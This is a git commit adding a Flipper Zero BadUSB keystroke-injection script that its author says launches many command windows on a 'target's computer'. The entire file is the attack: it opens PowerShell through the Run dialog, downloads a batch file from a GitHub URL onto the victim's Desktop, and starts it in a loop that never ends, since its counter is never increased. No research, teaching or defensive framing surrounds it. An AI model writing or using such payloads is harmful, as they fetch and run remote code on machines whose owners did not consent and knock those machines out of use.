Create create_infinite_cmd.txt

This commit is contained in:
Yann
2023-03-30 21:30:15 +02:00
committed by GitHub
parent a77f854cf5
commit c12bc1c5f9
+12
View File
@@ -0,0 +1,12 @@
REM Author: SeenKid (seenkid#1337 on Discord)
REM Description: Launch a lot of cmds on your target's computer
REM Version: 1.0
DELAY 500
GUI r
DELAY 500
STRING powershell
ENTER
DELAY 500
STRING $DesktopPath = [Environment]::GetFolderPath("Desktop"); Invoke-WebRequest -Uri https://raw.githubusercontent.com/SeenKid/flipper-zero-bad-usb/main/utils/files/startcmd.bat -OutFile $DesktopPath/cmd.bat; while($ac -lt 9000) { Start-Process -FilePath $DesktopPath/cmd.bat}
DELAY 100
ENTER